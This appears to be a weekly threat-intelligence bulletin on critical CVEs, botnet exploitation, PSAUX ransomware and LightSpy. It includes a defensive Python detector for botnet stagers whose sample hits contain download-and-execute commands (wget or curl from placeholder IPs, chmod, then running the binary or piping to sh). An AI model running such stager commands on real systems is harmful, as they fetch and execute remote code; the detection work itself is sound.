Executive Summary
CISA's Known Exploited Vulnerabilities (KEV) catalog saw no new additions this week, but that is no signal of quiet: critical vulnerabilities were disclosed in Grafana OSS, VMware vCenter Server, and DrayTek Vigor routers. On the patching side, Google fixed a critical Chrome vulnerability reported by Apple, and Progress released a fix for a critical flaw in WhatsUp Gold. Organizations should treat the items below as this week's patch priorities.
With the PSAUX ransomware campaign against CyberPanel and the LightSpy iOS implant both ramping up activity this week, the case for tightening exposure management and patch cadence is as strong as ever.
The IoT_Reaper botnet remains active and continues to exploit a vulnerability in MVPower CCTV DVR models, while Zerobot has been observed targeting a three-year-old flaw in the Apache HTTP Server. Enemybot, LiquorBot, and the long-running Mirai family are still leveraging a nine-year-old vulnerability in D-Link DIR-645 routers, a reminder that botnets rarely retire an exploit that keeps working.
Trending / Critical Vulnerabilities
This section lists the vulnerabilities that drew the most discussion and exploitation interest this week, to support patch prioritization.
A critical SQL injection vulnerability in Grafana's experimental SQL Expressions feature lets any authenticated user execute arbitrary DuckDB SQL by editing a dashboard expression, including DuckDB functions that read files from the Grafana host. It is scored CVSS 9.9, affects both Grafana OSS and Grafana Enterprise, and a public proof of concept is available. One practical caveat: exploitation requires the duckdb binary to be present on the Grafana server's PATH, which is not the case in a default installation, so hosts with DuckDB installed alongside Grafana should be treated as the most urgent.
VMware vCenter Server contains a critical heap overflow vulnerability: an attacker with network access to vCenter can trigger it with a specially crafted packet, potentially achieving remote code execution. It affects versions 8.0 U3a and earlier, carries a CVSS score of 9.8, and a proof of concept is available.
DrayTek Vigor2960 routers running firmware version 1.4.4 are affected by a remote code execution vulnerability with a CVSS score of 8.0. Successful exploitation could lead to data theft, network disruption, malware distribution, and recruitment of the device into a botnet. A published proof of concept raises the likelihood of exploitation, so exposed management interfaces on these routers should be treated as a critical risk.
Google has fixed an out-of-bounds write vulnerability in Chrome that it rated critical in its release notes and that carries a CVSS score of 8.8. The flaw, reported by Apple, lies in Dawn, Chrome's WebGPU implementation, and affects versions prior to 130.0.6723.92.
A critical authentication bypass vulnerability in Progress Software's WhatsUp Gold, affecting versions prior to 2024.0.0 and scored CVSS 9.8, lets an attacker retrieve encrypted user credentials, which can then be leveraged for further unauthorized access.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft's Cytellite sensors was analyzed to determine which vulnerabilities are being actively exploited and which are being actively scanned. The underlying evidence, source IPv4 addresses and payloads, can be provided on a need-to-know basis.
Vulnerabilities Abused by Botnets
This section covers vulnerabilities observed being exploited by botnets, including recent CVEs logged in MISP. The top five CVEs are presented, selected by payloads suggestive of botnet activity, such as fetching a stager with wget from a bare IP address.
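The selection criterion above, a payload that fetches something with wget (or a similar tool) from a bare IPv4 literal, is a cheap and effective triage rule for IoT botnet stagers. The script below is an added example, not Loginsoft or Cytellite code, showing how such a rule can be applied to captured hits: it URL-decodes the payload (scanners frequently double-encode), splits it on shell separators, flags any segment whose command is a fetch tool and contains an IPv4 literal, and separately notes whether the payload also runs what it fetched. The hit layout (src, uri, body), the tool list, and all sample payloads are constructed for illustration and use documentation address ranges.

```python
"""Heuristic triage of sensor hits for IoT-botnet download-and-execute stagers.

Added example, not Loginsoft/Cytellite code. The hit shape (src, uri, body)
and all sample payloads below are constructed for illustration.
"""
import os
import re
from urllib.parse import unquote_plus

# Assumed fetch tools; extend to taste (ftpget, busybox applets, ...).
FETCH_TOOLS = {"wget", "curl", "tftp", "ftpget"}
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)
# Shell command separators; '&&' and '||' must precede the single-char forms.
SEGMENT_RE = re.compile(r"\s*(?:;|&&|\|\||&|\||\n)\s*")
# Signs that the fetched file is executed: chmod, sh <file>, | sh, ./file
EXEC_RE = re.compile(
    r"\bchmod\s+\S+|\b(?:ba)?sh\s+[\w./-]+|\|\s*(?:ba)?sh\b|(?<![\w/.])\./[\w.-]+"
)


def decode_payload(raw: str) -> str:
    """URL-decode until the string stops changing (handles double encoding)."""
    prev, cur = None, raw
    while cur != prev:
        prev, cur = cur, unquote_plus(cur)
    return cur


def classify_payload(raw: str) -> dict:
    """Flag payloads that fetch a file from a bare IPv4 literal.

    Returns the (tool, ip) pairs found plus whether the payload also tries
    to run what it fetched, which is what turns a download into a stager.
    """
    payload = decode_payload(raw)
    hosts = []
    for segment in SEGMENT_RE.split(payload):
        words = segment.split()
        if not words:
            continue
        tool = os.path.basename(words[0]).lower()
        if tool == "busybox" and len(words) > 1:  # "/bin/busybox wget ..."
            tool = words[1].lower()
        if tool not in FETCH_TOOLS:
            continue
        hosts.extend((tool, ip) for ip in IPV4_RE.findall(segment))
    return {
        "stager_hosts": hosts,
        "executes": bool(EXEC_RE.search(payload)),
        "botnet_like": bool(hosts),
    }


def classify_hit(hit: dict) -> dict:
    """Scan request path and body together; payloads land in either."""
    return classify_payload(hit["uri"] + "\n" + hit.get("body", ""))


# Constructed sensor hits (documentation address ranges), not real captures.
SAMPLE_HITS = [
    {"src": "198.51.100.7",
     "uri": "/shell?cd%20/tmp;wget%20http://192.0.2.10/bins/arm7;chmod%20777%20arm7;./arm7",
     "body": ""},
    {"src": "198.51.100.8", "uri": "/HNAP1/",
     "body": "cd /tmp && /bin/busybox wget http://203.0.113.5:8080/x.sh && sh x.sh"},
    {"src": "198.51.100.9", "uri": "/cgi-bin/status?ip=10.0.0.1", "body": ""},
    {"src": "198.51.100.10", "uri": "/",
     "body": "curl -s https://example.org/install.sh | sh"},
]


def stager_report(hits):
    """(src, tool, ip) for every hit whose payload looks like a botnet stager."""
    out = []
    for hit in hits:
        for tool, ip in classify_hit(hit)["stager_hosts"]:
            out.append((hit["src"], tool, ip))
    return out


if __name__ == "__main__":
    for src, tool, ip in stager_report(SAMPLE_HITS):
        print(f"{src} -> {tool} stager from {ip}")
```

The third sample carries an IPv4 literal but no fetch tool and the fourth fetches from a hostname, so neither is flagged; the rule is deliberately narrow, which keeps false positives low but means hostname-based stagers need a separate rule. The extracted IPs are the useful by-product: they are the download hosts to block and to pivot on across other hits.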
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that adversaries are targeting. Each vulnerability is manually reviewed and mapped to MITRE ATT&CK tactics and techniques. The information comes from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
CVE-2024-51567, CVE-2024-51568 and CVE-2024-51378
Threat actors are actively exploiting three critical remote code execution vulnerabilities in CyberPanel, a widely used web hosting control panel, to compromise servers and deploy PSAUX ransomware. The flaws affect versions 2.3.6 and 2.3.7 and allow unauthenticated attackers to gain root access, giving them full control over the affected system.
CVE-2020-9802 and CVE-2020-3837
The LightSpy operators have broadened their targeting to iOS, going after devices running iOS 13.3 and earlier. The chain uses two publicly known vulnerabilities: CVE-2020-9802, a WebKit bug reached through Safari, for initial access, and CVE-2020-3837 for privilege escalation. The implant also carries destructive capabilities, such as wiping the contact list and rendering the device unusable by deleting critical system components.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities that are disclosed, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI platform aggregates and distributes this data from open sources and social media; it currently tracks over 100 security alerts, with expansion planned.
External References
- https://www.securityweek.com/google-patches-critical-chrome-vulnerability-reported-by-apple/
- https://securityonline.info/cve-2024-48074-rce-flaw-discovered-in-draytek-vigor2960-routers-poc-published/
- https://www.threatfabric.com/blogs/lightspy-implant-for-ios
- https://securityonline.info/psaux-ransomware-is-exploiting-two-max-severity-flaws-cve-2024-51567-cve-2024-51568-in-cyberpanel/
- https://securityonline.info/grafana-vulnerability-cve-2024-9264-poc-released-for-9-9-rated-critical-flaw/